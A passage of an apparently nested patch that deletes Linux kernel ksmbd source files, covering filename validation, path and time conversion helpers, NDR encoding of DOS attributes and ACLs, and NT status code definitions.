+-	     ch == '?' || ch == '"' || ch == '<' ||
+-	     ch == '>' || ch == '|' || ch == '*'))
+-		return 0;
+-
+-	return 1;
+-}
+-
+-int ksmbd_validate_filename(char *filename)
+-{
+-	while (*filename) {
+-		char c = *filename;
+-
+-		filename++;
+-		if (!is_char_allowed(c)) {
+-			ksmbd_debug(VFS, "File name validation failed: 0x%x\n", c);
+-			return -ENOENT;
+-		}
+-	}
+-
+-	return 0;
+-}
+-
+-static int ksmbd_validate_stream_name(char *stream_name)
+-{
+-	while (*stream_name) {
+-		char c = *stream_name;
+-
+-		stream_name++;
+-		if (c == '/' || c == ':' || c == '\\') {
+-			pr_err("Stream name validation failed: %c\n", c);
+-			return -ENOENT;
+-		}
+-	}
+-
+-	return 0;
+-}
+-
+-int parse_stream_name(char *filename, char **stream_name, int *s_type)
+-{
+-	char *stream_type;
+-	char *s_name;
+-	int rc = 0;
+-
+-	s_name = filename;
+-	filename = strsep(&s_name, ":");
+-	ksmbd_debug(SMB, "filename : %s, streams : %s\n", filename, s_name);
+-	if (strchr(s_name, ':')) {
+-		stream_type = s_name;
+-		s_name = strsep(&stream_type, ":");
+-
+-		rc = ksmbd_validate_stream_name(s_name);
+-		if (rc < 0) {
+-			rc = -ENOENT;
+-			goto out;
+-		}
+-
+-		ksmbd_debug(SMB, "stream name : %s, stream type : %s\n", s_name,
+-			    stream_type);
+-		if (!strncasecmp("$data", stream_type, 5))
+-			*s_type = DATA_STREAM;
+-		else if (!strncasecmp("$index_allocation", stream_type, 17))
+-			*s_type = DIR_STREAM;
+-		else
+-			rc = -ENOENT;
+-	}
+-
+-	*stream_name = s_name;
+-out:
+-	return rc;
+-}
+-
+-/**
+- * convert_to_nt_pathname() - extract and return windows path string
+- *      whose share directory prefix was removed from file path
+- * @share: ksmbd_share_config pointer
+- * @path: path to report
+- *
+- * Return : windows path string or error
+- */
+-
+-char *convert_to_nt_pathname(struct ksmbd_share_config *share,
+-			     const struct path *path)
+-{
+-	char *pathname, *ab_pathname, *nt_pathname;
+-	int share_path_len = share->path_sz;
+-
+-	pathname = kmalloc(PATH_MAX, GFP_KERNEL);
+-	if (!pathname)
+-		return ERR_PTR(-EACCES);
+-
+-	ab_pathname = d_path(path, pathname, PATH_MAX);
+-	if (IS_ERR(ab_pathname)) {
+-		nt_pathname = ERR_PTR(-EACCES);
+-		goto free_pathname;
+-	}
+-
+-	if (strncmp(ab_pathname, share->path, share_path_len)) {
+-		nt_pathname = ERR_PTR(-EACCES);
+-		goto free_pathname;
+-	}
+-
+-	nt_pathname = kzalloc(strlen(&ab_pathname[share_path_len]) + 2, GFP_KERNEL);
+-	if (!nt_pathname) {
+-		nt_pathname = ERR_PTR(-ENOMEM);
+-		goto free_pathname;
+-	}
+-	if (ab_pathname[share_path_len] == '\0')
+-		strcpy(nt_pathname, "/");
+-	strcat(nt_pathname, &ab_pathname[share_path_len]);
+-
+-	ksmbd_conv_path_to_windows(nt_pathname);
+-
+-free_pathname:
+-	kfree(pathname);
+-	return nt_pathname;
+-}
+-
+-int get_nlink(struct kstat *st)
+-{
+-	int nlink;
+-
+-	nlink = st->nlink;
+-	if (S_ISDIR(st->mode))
+-		nlink--;
+-
+-	return nlink;
+-}
+-
+-void ksmbd_conv_path_to_unix(char *path)
+-{
+-	strreplace(path, '\\', '/');
+-}
+-
+-void ksmbd_strip_last_slash(char *path)
+-{
+-	int len = strlen(path);
+-
+-	while (len && path[len - 1] == '/') {
+-		path[len - 1] = '\0';
+-		len--;
+-	}
+-}
+-
+-void ksmbd_conv_path_to_windows(char *path)
+-{
+-	strreplace(path, '/', '\\');
+-}
+-
+-char *ksmbd_casefold_sharename(struct unicode_map *um, const char *name)
+-{
+-	char *cf_name;
+-	int cf_len;
+-
+-	cf_name = kzalloc(KSMBD_REQ_MAX_SHARE_NAME, GFP_KERNEL);
+-	if (!cf_name)
+-		return ERR_PTR(-ENOMEM);
+-
+-	if (IS_ENABLED(CONFIG_UNICODE) && um) {
+-		const struct qstr q_name = {.name = name, .len = strlen(name)};
+-
+-		cf_len = utf8_casefold(um, &q_name, cf_name,
+-				       KSMBD_REQ_MAX_SHARE_NAME);
+-		if (cf_len < 0)
+-			goto out_ascii;
+-
+-		return cf_name;
+-	}
+-
+-out_ascii:
+-	cf_len = strscpy(cf_name, name, KSMBD_REQ_MAX_SHARE_NAME);
+-	if (cf_len < 0) {
+-		kfree(cf_name);
+-		return ERR_PTR(-E2BIG);
+-	}
+-
+-	for (; *cf_name; ++cf_name)
+-		*cf_name = isascii(*cf_name) ? tolower(*cf_name) : *cf_name;
+-	return cf_name - cf_len;
+-}
+-
+-/**
+- * ksmbd_extract_sharename() - get share name from tree connect request
+- * @treename:	buffer containing tree name and share name
+- *
+- * Return:      share name on success, otherwise error
+- */
+-char *ksmbd_extract_sharename(struct unicode_map *um, const char *treename)
+-{
+-	const char *name = treename, *pos = strrchr(name, '\\');
+-
+-	if (pos)
+-		name = (pos + 1);
+-
+-	/* caller has to free the memory */
+-	return ksmbd_casefold_sharename(um, name);
+-}
+-
+-/**
+- * convert_to_unix_name() - convert windows name to unix format
+- * @share:	ksmbd_share_config pointer
+- * @name:	file name that is relative to share
+- *
+- * Return:	converted name on success, otherwise NULL
+- */
+-char *convert_to_unix_name(struct ksmbd_share_config *share, const char *name)
+-{
+-	int no_slash = 0, name_len, path_len;
+-	char *new_name;
+-
+-	if (name[0] == '/')
+-		name++;
+-
+-	path_len = share->path_sz;
+-	name_len = strlen(name);
+-	new_name = kmalloc(path_len + name_len + 2, GFP_KERNEL);
+-	if (!new_name)
+-		return new_name;
+-
+-	memcpy(new_name, share->path, path_len);
+-	if (new_name[path_len - 1] != '/') {
+-		new_name[path_len] = '/';
+-		no_slash = 1;
+-	}
+-
+-	memcpy(new_name + path_len + no_slash, name, name_len);
+-	path_len += name_len + no_slash;
+-	new_name[path_len] = 0x00;
+-	return new_name;
+-}
+-
+-char *ksmbd_convert_dir_info_name(struct ksmbd_dir_info *d_info,
+-				  const struct nls_table *local_nls,
+-				  int *conv_len)
+-{
+-	char *conv;
+-	int  sz = min(4 * d_info->name_len, PATH_MAX);
+-
+-	if (!sz)
+-		return NULL;
+-
+-	conv = kmalloc(sz, GFP_KERNEL);
+-	if (!conv)
+-		return NULL;
+-
+-	/* XXX */
+-	*conv_len = smbConvertToUTF16((__le16 *)conv, d_info->name,
+-				      d_info->name_len, local_nls, 0);
+-	*conv_len *= 2;
+-
+-	/* We allocate buffer twice bigger than needed. */
+-	conv[*conv_len] = 0x00;
+-	conv[*conv_len + 1] = 0x00;
+-	return conv;
+-}
+-
+-/*
+- * Convert the NT UTC (based 1601-01-01, in hundred nanosecond units)
+- * into Unix UTC (based 1970-01-01, in seconds).
+- */
+-struct timespec64 ksmbd_NTtimeToUnix(__le64 ntutc)
+-{
+-	struct timespec64 ts;
+-
+-	/* Subtract the NTFS time offset, then convert to 1s intervals. */
+-	s64 t = le64_to_cpu(ntutc) - NTFS_TIME_OFFSET;
+-	u64 abs_t;
+-
+-	/*
+-	 * Unfortunately can not use normal 64 bit division on 32 bit arch, but
+-	 * the alternative, do_div, does not work with negative numbers so have
+-	 * to special case them
+-	 */
+-	if (t < 0) {
+-		abs_t = -t;
+-		ts.tv_nsec = do_div(abs_t, 10000000) * 100;
+-		ts.tv_nsec = -ts.tv_nsec;
+-		ts.tv_sec = -abs_t;
+-	} else {
+-		abs_t = t;
+-		ts.tv_nsec = do_div(abs_t, 10000000) * 100;
+-		ts.tv_sec = abs_t;
+-	}
+-
+-	return ts;
+-}
+-
+-/* Convert the Unix UTC into NT UTC. */
+-inline u64 ksmbd_UnixTimeToNT(struct timespec64 t)
+-{
+-	/* Convert to 100ns intervals and then add the NTFS time offset. */
+-	return (u64)t.tv_sec * 10000000 + t.tv_nsec / 100 + NTFS_TIME_OFFSET;
+-}
+-
+-inline long long ksmbd_systime(void)
+-{
+-	struct timespec64	ts;
+-
+-	ktime_get_real_ts64(&ts);
+-	return ksmbd_UnixTimeToNT(ts);
+-}
+diff --git a/fs/ksmbd/misc.h b/fs/ksmbd/misc.h
+deleted file mode 100644
+index 1facfcd21200f..0000000000000
+--- a/fs/ksmbd/misc.h
++++ /dev/null
+@@ -1,37 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __KSMBD_MISC_H__
+-#define __KSMBD_MISC_H__
+-
+-struct ksmbd_share_config;
+-struct nls_table;
+-struct kstat;
+-struct ksmbd_file;
+-
+-int match_pattern(const char *str, size_t len, const char *pattern);
+-int ksmbd_validate_filename(char *filename);
+-int parse_stream_name(char *filename, char **stream_name, int *s_type);
+-char *convert_to_nt_pathname(struct ksmbd_share_config *share,
+-			     const struct path *path);
+-int get_nlink(struct kstat *st);
+-void ksmbd_conv_path_to_unix(char *path);
+-void ksmbd_strip_last_slash(char *path);
+-void ksmbd_conv_path_to_windows(char *path);
+-char *ksmbd_casefold_sharename(struct unicode_map *um, const char *name);
+-char *ksmbd_extract_sharename(struct unicode_map *um, const char *treename);
+-char *convert_to_unix_name(struct ksmbd_share_config *share, const char *name);
+-
+-#define KSMBD_DIR_INFO_ALIGNMENT	8
+-struct ksmbd_dir_info;
+-char *ksmbd_convert_dir_info_name(struct ksmbd_dir_info *d_info,
+-				  const struct nls_table *local_nls,
+-				  int *conv_len);
+-
+-#define NTFS_TIME_OFFSET	((u64)(369 * 365 + 89) * 24 * 3600 * 10000000)
+-struct timespec64 ksmbd_NTtimeToUnix(__le64 ntutc);
+-u64 ksmbd_UnixTimeToNT(struct timespec64 t);
+-long long ksmbd_systime(void);
+-#endif /* __KSMBD_MISC_H__ */
+diff --git a/fs/ksmbd/ndr.c b/fs/ksmbd/ndr.c
+deleted file mode 100644
+index 4d9e0b54e3dbf..0000000000000
+--- a/fs/ksmbd/ndr.c
++++ /dev/null
+@@ -1,514 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2021 Samsung Electronics Co., Ltd.
+- *   Author(s): Namjae Jeon <linkinjeon@kernel.org>
+- */
+-
+-#include <linux/fs.h>
+-
+-#include "glob.h"
+-#include "ndr.h"
+-
+-static inline char *ndr_get_field(struct ndr *n)
+-{
+-	return n->data + n->offset;
+-}
+-
+-static int try_to_realloc_ndr_blob(struct ndr *n, size_t sz)
+-{
+-	char *data;
+-
+-	data = krealloc(n->data, n->offset + sz + 1024, GFP_KERNEL);
+-	if (!data)
+-		return -ENOMEM;
+-
+-	n->data = data;
+-	n->length += 1024;
+-	memset(n->data + n->offset, 0, 1024);
+-	return 0;
+-}
+-
+-static int ndr_write_int16(struct ndr *n, __u16 value)
+-{
+-	if (n->length <= n->offset + sizeof(value)) {
+-		int ret;
+-
+-		ret = try_to_realloc_ndr_blob(n, sizeof(value));
+-		if (ret)
+-			return ret;
+-	}
+-
+-	*(__le16 *)ndr_get_field(n) = cpu_to_le16(value);
+-	n->offset += sizeof(value);
+-	return 0;
+-}
+-
+-static int ndr_write_int32(struct ndr *n, __u32 value)
+-{
+-	if (n->length <= n->offset + sizeof(value)) {
+-		int ret;
+-
+-		ret = try_to_realloc_ndr_blob(n, sizeof(value));
+-		if (ret)
+-			return ret;
+-	}
+-
+-	*(__le32 *)ndr_get_field(n) = cpu_to_le32(value);
+-	n->offset += sizeof(value);
+-	return 0;
+-}
+-
+-static int ndr_write_int64(struct ndr *n, __u64 value)
+-{
+-	if (n->length <= n->offset + sizeof(value)) {
+-		int ret;
+-
+-		ret = try_to_realloc_ndr_blob(n, sizeof(value));
+-		if (ret)
+-			return ret;
+-	}
+-
+-	*(__le64 *)ndr_get_field(n) = cpu_to_le64(value);
+-	n->offset += sizeof(value);
+-	return 0;
+-}
+-
+-static int ndr_write_bytes(struct ndr *n, void *value, size_t sz)
+-{
+-	if (n->length <= n->offset + sz) {
+-		int ret;
+-
+-		ret = try_to_realloc_ndr_blob(n, sz);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	memcpy(ndr_get_field(n), value, sz);
+-	n->offset += sz;
+-	return 0;
+-}
+-
+-static int ndr_write_string(struct ndr *n, char *value)
+-{
+-	size_t sz;
+-
+-	sz = strlen(value) + 1;
+-	if (n->length <= n->offset + sz) {
+-		int ret;
+-
+-		ret = try_to_realloc_ndr_blob(n, sz);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	memcpy(ndr_get_field(n), value, sz);
+-	n->offset += sz;
+-	n->offset = ALIGN(n->offset, 2);
+-	return 0;
+-}
+-
+-static int ndr_read_string(struct ndr *n, void *value, size_t sz)
+-{
+-	int len;
+-
+-	if (n->offset + sz > n->length)
+-		return -EINVAL;
+-
+-	len = strnlen(ndr_get_field(n), sz);
+-	if (value)
+-		memcpy(value, ndr_get_field(n), len);
+-	len++;
+-	n->offset += len;
+-	n->offset = ALIGN(n->offset, 2);
+-	return 0;
+-}
+-
+-static int ndr_read_bytes(struct ndr *n, void *value, size_t sz)
+-{
+-	if (n->offset + sz > n->length)
+-		return -EINVAL;
+-
+-	if (value)
+-		memcpy(value, ndr_get_field(n), sz);
+-	n->offset += sz;
+-	return 0;
+-}
+-
+-static int ndr_read_int16(struct ndr *n, __u16 *value)
+-{
+-	if (n->offset + sizeof(__u16) > n->length)
+-		return -EINVAL;
+-
+-	if (value)
+-		*value = le16_to_cpu(*(__le16 *)ndr_get_field(n));
+-	n->offset += sizeof(__u16);
+-	return 0;
+-}
+-
+-static int ndr_read_int32(struct ndr *n, __u32 *value)
+-{
+-	if (n->offset + sizeof(__u32) > n->length)
+-		return -EINVAL;
+-
+-	if (value)
+-		*value = le32_to_cpu(*(__le32 *)ndr_get_field(n));
+-	n->offset += sizeof(__u32);
+-	return 0;
+-}
+-
+-static int ndr_read_int64(struct ndr *n, __u64 *value)
+-{
+-	if (n->offset + sizeof(__u64) > n->length)
+-		return -EINVAL;
+-
+-	if (value)
+-		*value = le64_to_cpu(*(__le64 *)ndr_get_field(n));
+-	n->offset += sizeof(__u64);
+-	return 0;
+-}
+-
+-int ndr_encode_dos_attr(struct ndr *n, struct xattr_dos_attrib *da)
+-{
+-	char hex_attr[12] = {0};
+-	int ret;
+-
+-	n->offset = 0;
+-	n->length = 1024;
+-	n->data = kzalloc(n->length, GFP_KERNEL);
+-	if (!n->data)
+-		return -ENOMEM;
+-
+-	if (da->version == 3) {
+-		snprintf(hex_attr, 10, "0x%x", da->attr);
+-		ret = ndr_write_string(n, hex_attr);
+-	} else {
+-		ret = ndr_write_string(n, "");
+-	}
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_int16(n, da->version);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_int32(n, da->version);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_int32(n, da->flags);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_int32(n, da->attr);
+-	if (ret)
+-		return ret;
+-
+-	if (da->version == 3) {
+-		ret = ndr_write_int32(n, da->ea_size);
+-		if (ret)
+-			return ret;
+-		ret = ndr_write_int64(n, da->size);
+-		if (ret)
+-			return ret;
+-		ret = ndr_write_int64(n, da->alloc_size);
+-	} else {
+-		ret = ndr_write_int64(n, da->itime);
+-	}
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_int64(n, da->create_time);
+-	if (ret)
+-		return ret;
+-
+-	if (da->version == 3)
+-		ret = ndr_write_int64(n, da->change_time);
+-	return ret;
+-}
+-
+-int ndr_decode_dos_attr(struct ndr *n, struct xattr_dos_attrib *da)
+-{
+-	char hex_attr[12];
+-	unsigned int version2;
+-	int ret;
+-
+-	n->offset = 0;
+-	ret = ndr_read_string(n, hex_attr, sizeof(hex_attr));
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_read_int16(n, &da->version);
+-	if (ret)
+-		return ret;
+-
+-	if (da->version != 3 && da->version != 4) {
+-		ksmbd_debug(VFS, "v%d version is not supported\n", da->version);
+-		return -EINVAL;
+-	}
+-
+-	ret = ndr_read_int32(n, &version2);
+-	if (ret)
+-		return ret;
+-
+-	if (da->version != version2) {
+-		ksmbd_debug(VFS, "ndr version mismatched(version: %d, version2: %d)\n",
+-		       da->version, version2);
+-		return -EINVAL;
+-	}
+-
+-	ret = ndr_read_int32(n, NULL);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_read_int32(n, &da->attr);
+-	if (ret)
+-		return ret;
+-
+-	if (da->version == 4) {
+-		ret = ndr_read_int64(n, &da->itime);
+-		if (ret)
+-			return ret;
+-
+-		ret = ndr_read_int64(n, &da->create_time);
+-	} else {
+-		ret = ndr_read_int32(n, NULL);
+-		if (ret)
+-			return ret;
+-
+-		ret = ndr_read_int64(n, NULL);
+-		if (ret)
+-			return ret;
+-
+-		ret = ndr_read_int64(n, NULL);
+-		if (ret)
+-			return ret;
+-
+-		ret = ndr_read_int64(n, &da->create_time);
+-		if (ret)
+-			return ret;
+-
+-		ret = ndr_read_int64(n, NULL);
+-	}
+-
+-	return ret;
+-}
+-
+-static int ndr_encode_posix_acl_entry(struct ndr *n, struct xattr_smb_acl *acl)
+-{
+-	int i, ret;
+-
+-	ret = ndr_write_int32(n, acl->count);
+-	if (ret)
+-		return ret;
+-
+-	n->offset = ALIGN(n->offset, 8);
+-	ret = ndr_write_int32(n, acl->count);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_int32(n, 0);
+-	if (ret)
+-		return ret;
+-
+-	for (i = 0; i < acl->count; i++) {
+-		n->offset = ALIGN(n->offset, 8);
+-		ret = ndr_write_int16(n, acl->entries[i].type);
+-		if (ret)
+-			return ret;
+-
+-		ret = ndr_write_int16(n, acl->entries[i].type);
+-		if (ret)
+-			return ret;
+-
+-		if (acl->entries[i].type == SMB_ACL_USER) {
+-			n->offset = ALIGN(n->offset, 8);
+-			ret = ndr_write_int64(n, acl->entries[i].uid);
+-		} else if (acl->entries[i].type == SMB_ACL_GROUP) {
+-			n->offset = ALIGN(n->offset, 8);
+-			ret = ndr_write_int64(n, acl->entries[i].gid);
+-		}
+-		if (ret)
+-			return ret;
+-
+-		/* push permission */
+-		ret = ndr_write_int32(n, acl->entries[i].perm);
+-	}
+-
+-	return ret;
+-}
+-
+-int ndr_encode_posix_acl(struct ndr *n,
+-			 struct user_namespace *user_ns,
+-			 struct inode *inode,
+-			 struct xattr_smb_acl *acl,
+-			 struct xattr_smb_acl *def_acl)
+-{
+-	unsigned int ref_id = 0x00020000;
+-	int ret;
+-	vfsuid_t vfsuid;
+-	vfsgid_t vfsgid;
+-
+-	n->offset = 0;
+-	n->length = 1024;
+-	n->data = kzalloc(n->length, GFP_KERNEL);
+-	if (!n->data)
+-		return -ENOMEM;
+-
+-	if (acl) {
+-		/* ACL ACCESS */
+-		ret = ndr_write_int32(n, ref_id);
+-		ref_id += 4;
+-	} else {
+-		ret = ndr_write_int32(n, 0);
+-	}
+-	if (ret)
+-		return ret;
+-
+-	if (def_acl) {
+-		/* DEFAULT ACL ACCESS */
+-		ret = ndr_write_int32(n, ref_id);
+-		ref_id += 4;
+-	} else {
+-		ret = ndr_write_int32(n, 0);
+-	}
+-	if (ret)
+-		return ret;
+-
+-	vfsuid = i_uid_into_vfsuid(user_ns, inode);
+-	ret = ndr_write_int64(n, from_kuid(&init_user_ns, vfsuid_into_kuid(vfsuid)));
+-	if (ret)
+-		return ret;
+-	vfsgid = i_gid_into_vfsgid(user_ns, inode);
+-	ret = ndr_write_int64(n, from_kgid(&init_user_ns, vfsgid_into_kgid(vfsgid)));
+-	if (ret)
+-		return ret;
+-	ret = ndr_write_int32(n, inode->i_mode);
+-	if (ret)
+-		return ret;
+-
+-	if (acl) {
+-		ret = ndr_encode_posix_acl_entry(n, acl);
+-		if (def_acl && !ret)
+-			ret = ndr_encode_posix_acl_entry(n, def_acl);
+-	}
+-	return ret;
+-}
+-
+-int ndr_encode_v4_ntacl(struct ndr *n, struct xattr_ntacl *acl)
+-{
+-	unsigned int ref_id = 0x00020004;
+-	int ret;
+-
+-	n->offset = 0;
+-	n->length = 2048;
+-	n->data = kzalloc(n->length, GFP_KERNEL);
+-	if (!n->data)
+-		return -ENOMEM;
+-
+-	ret = ndr_write_int16(n, acl->version);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_int32(n, acl->version);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_int16(n, 2);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_int32(n, ref_id);
+-	if (ret)
+-		return ret;
+-
+-	/* push hash type and hash 64bytes */
+-	ret = ndr_write_int16(n, acl->hash_type);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_bytes(n, acl->hash, XATTR_SD_HASH_SIZE);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_bytes(n, acl->desc, acl->desc_len);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_int64(n, acl->current_time);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_bytes(n, acl->posix_acl_hash, XATTR_SD_HASH_SIZE);
+-	if (ret)
+-		return ret;
+-
+-	/* push ndr for security descriptor */
+-	ret = ndr_write_bytes(n, acl->sd_buf, acl->sd_size);
+-	return ret;
+-}
+-
+-int ndr_decode_v4_ntacl(struct ndr *n, struct xattr_ntacl *acl)
+-{
+-	unsigned int version2;
+-	int ret;
+-
+-	n->offset = 0;
+-	ret = ndr_read_int16(n, &acl->version);
+-	if (ret)
+-		return ret;
+-	if (acl->version != 4) {
+-		ksmbd_debug(VFS, "v%d version is not supported\n", acl->version);
+-		return -EINVAL;
+-	}
+-
+-	ret = ndr_read_int32(n, &version2);
+-	if (ret)
+-		return ret;
+-	if (acl->version != version2) {
+-		ksmbd_debug(VFS, "ndr version mismatched(version: %d, version2: %d)\n",
+-		       acl->version, version2);
+-		return -EINVAL;
+-	}
+-
+-	/* Read Level */
+-	ret = ndr_read_int16(n, NULL);
+-	if (ret)
+-		return ret;
+-
+-	/* Read Ref Id */
+-	ret = ndr_read_int32(n, NULL);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_read_int16(n, &acl->hash_type);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_read_bytes(n, acl->hash, XATTR_SD_HASH_SIZE);
+-	if (ret)
+-		return ret;
+-
+-	ndr_read_bytes(n, acl->desc, 10);
+-	if (strncmp(acl->desc, "posix_acl", 9)) {
+-		pr_err("Invalid acl description : %s\n", acl->desc);
+-		return -EINVAL;
+-	}
+-
+-	/* Read Time */
+-	ret = ndr_read_int64(n, NULL);
+-	if (ret)
+-		return ret;
+-
+-	/* Read Posix ACL hash */
+-	ret = ndr_read_bytes(n, acl->posix_acl_hash, XATTR_SD_HASH_SIZE);
+-	if (ret)
+-		return ret;
+-
+-	acl->sd_size = n->length - n->offset;
+-	acl->sd_buf = kzalloc(acl->sd_size, GFP_KERNEL);
+-	if (!acl->sd_buf)
+-		return -ENOMEM;
+-
+-	ret = ndr_read_bytes(n, acl->sd_buf, acl->sd_size);
+-	return ret;
+-}
+diff --git a/fs/ksmbd/ndr.h b/fs/ksmbd/ndr.h
+deleted file mode 100644
+index 60ca265d1bb01..0000000000000
+--- a/fs/ksmbd/ndr.h
++++ /dev/null
+@@ -1,22 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2020 Samsung Electronics Co., Ltd.
+- *   Author(s): Namjae Jeon <linkinjeon@kernel.org>
+- */
+-
+-struct ndr {
+-	char	*data;
+-	int	offset;
+-	int	length;
+-};
+-
+-#define NDR_NTSD_OFFSETOF	0xA0
+-
+-int ndr_encode_dos_attr(struct ndr *n, struct xattr_dos_attrib *da);
+-int ndr_decode_dos_attr(struct ndr *n, struct xattr_dos_attrib *da);
+-int ndr_encode_posix_acl(struct ndr *n, struct user_namespace *user_ns,
+-			 struct inode *inode, struct xattr_smb_acl *acl,
+-			 struct xattr_smb_acl *def_acl);
+-int ndr_encode_v4_ntacl(struct ndr *n, struct xattr_ntacl *acl);
+-int ndr_encode_v3_ntacl(struct ndr *n, struct xattr_ntacl *acl);
+-int ndr_decode_v4_ntacl(struct ndr *n, struct xattr_ntacl *acl);
+diff --git a/fs/ksmbd/nterr.h b/fs/ksmbd/nterr.h
+deleted file mode 100644
+index 2f358f88a0188..0000000000000
+--- a/fs/ksmbd/nterr.h
++++ /dev/null
+@@ -1,543 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- * Unix SMB/Netbios implementation.
+- * Version 1.9.
+- * NT error code constants
+- * Copyright (C) Andrew Tridgell              1992-2000
+- * Copyright (C) John H Terpstra              1996-2000
+- * Copyright (C) Luke Kenneth Casson Leighton 1996-2000
+- * Copyright (C) Paul Ashton                  1998-2000
+- */
+-
+-#ifndef _NTERR_H
+-#define _NTERR_H
+-
+-/* Win32 Status codes. */
+-#define NT_STATUS_MORE_ENTRIES         0x0105
+-#define NT_ERROR_INVALID_PARAMETER     0x0057
+-#define NT_ERROR_INSUFFICIENT_BUFFER   0x007a
+-#define NT_STATUS_1804                 0x070c
+-#define NT_STATUS_NOTIFY_ENUM_DIR      0x010c
+-#define NT_STATUS_INVALID_LOCK_RANGE   (0xC0000000 | 0x01a1)
+-/*
+- * Win32 Error codes extracted using a loop in smbclient then printing a netmon
+- * sniff to a file.
+- */
+-
+-#define NT_STATUS_OK                   0x0000
+-#define NT_STATUS_SOME_UNMAPPED        0x0107
+-#define NT_STATUS_BUFFER_OVERFLOW  0x80000005
+-#define NT_STATUS_NO_MORE_ENTRIES  0x8000001a
+-#define NT_STATUS_MEDIA_CHANGED    0x8000001c
+-#define NT_STATUS_END_OF_MEDIA     0x8000001e
+-#define NT_STATUS_MEDIA_CHECK      0x80000020
+-#define NT_STATUS_NO_DATA_DETECTED 0x8000001c
+-#define NT_STATUS_STOPPED_ON_SYMLINK 0x8000002d
+-#define NT_STATUS_DEVICE_REQUIRES_CLEANING 0x80000288
+-#define NT_STATUS_DEVICE_DOOR_OPEN 0x80000288
+-#define NT_STATUS_UNSUCCESSFUL (0xC0000000 | 0x0001)
+-#define NT_STATUS_NOT_IMPLEMENTED (0xC0000000 | 0x0002)
+-#define NT_STATUS_INVALID_INFO_CLASS (0xC0000000 | 0x0003)
+-#define NT_STATUS_INFO_LENGTH_MISMATCH (0xC0000000 | 0x0004)
+-#define NT_STATUS_ACCESS_VIOLATION (0xC0000000 | 0x0005)
+-#define NT_STATUS_IN_PAGE_ERROR (0xC0000000 | 0x0006)
+-#define NT_STATUS_PAGEFILE_QUOTA (0xC0000000 | 0x0007)
+-#define NT_STATUS_INVALID_HANDLE (0xC0000000 | 0x0008)
+-#define NT_STATUS_BAD_INITIAL_STACK (0xC0000000 | 0x0009)
+-#define NT_STATUS_BAD_INITIAL_PC (0xC0000000 | 0x000a)
+-#define NT_STATUS_INVALID_CID (0xC0000000 | 0x000b)
+-#define NT_STATUS_TIMER_NOT_CANCELED (0xC0000000 | 0x000c)
+-#define NT_STATUS_INVALID_PARAMETER (0xC0000000 | 0x000d)
+-#define NT_STATUS_NO_SUCH_DEVICE (0xC0000000 | 0x000e)
+-#define NT_STATUS_NO_SUCH_FILE (0xC0000000 | 0x000f)
+-#define NT_STATUS_INVALID_DEVICE_REQUEST (0xC0000000 | 0x0010)
+-#define NT_STATUS_END_OF_FILE (0xC0000000 | 0x0011)
+-#define NT_STATUS_WRONG_VOLUME (0xC0000000 | 0x0012)
+-#define NT_STATUS_NO_MEDIA_IN_DEVICE (0xC0000000 | 0x0013)
+-#define NT_STATUS_UNRECOGNIZED_MEDIA (0xC0000000 | 0x0014)
+-#define NT_STATUS_NONEXISTENT_SECTOR (0xC0000000 | 0x0015)
+-#define NT_STATUS_MORE_PROCESSING_REQUIRED (0xC0000000 | 0x0016)
+-#define NT_STATUS_NO_MEMORY (0xC0000000 | 0x0017)
+-#define NT_STATUS_CONFLICTING_ADDRESSES (0xC0000000 | 0x0018)
+-#define NT_STATUS_NOT_MAPPED_VIEW (0xC0000000 | 0x0019)
+-#define NT_STATUS_UNABLE_TO_FREE_VM (0x80000000 | 0x001a)
+-#define NT_STATUS_UNABLE_TO_DELETE_SECTION (0xC0000000 | 0x001b)
+-#define NT_STATUS_INVALID_SYSTEM_SERVICE (0xC0000000 | 0x001c)
+-#define NT_STATUS_ILLEGAL_INSTRUCTION (0xC0000000 | 0x001d)
+-#define NT_STATUS_INVALID_LOCK_SEQUENCE (0xC0000000 | 0x001e)
+-#define NT_STATUS_INVALID_VIEW_SIZE (0xC0000000 | 0x001f)
+-#define NT_STATUS_INVALID_FILE_FOR_SECTION (0xC0000000 | 0x0020)
+-#define NT_STATUS_ALREADY_COMMITTED (0xC0000000 | 0x0021)
+-#define NT_STATUS_ACCESS_DENIED (0xC0000000 | 0x0022)
+-#define NT_STATUS_BUFFER_TOO_SMALL (0xC0000000 | 0x0023)
+-#define NT_STATUS_OBJECT_TYPE_MISMATCH (0xC0000000 | 0x0024)
+-#define NT_STATUS_NONCONTINUABLE_EXCEPTION (0xC0000000 | 0x0025)
+-#define NT_STATUS_INVALID_DISPOSITION (0xC0000000 | 0x0026)
+-#define NT_STATUS_UNWIND (0xC0000000 | 0x0027)
+-#define NT_STATUS_BAD_STACK (0xC0000000 | 0x0028)
+-#define NT_STATUS_INVALID_UNWIND_TARGET (0xC0000000 | 0x0029)
+-#define NT_STATUS_NOT_LOCKED (0xC0000000 | 0x002a)
+-#define NT_STATUS_PARITY_ERROR (0xC0000000 | 0x002b)
+-#define NT_STATUS_UNABLE_TO_DECOMMIT_VM (0xC0000000 | 0x002c)
+-#define NT_STATUS_NOT_COMMITTED (0xC0000000 | 0x002d)
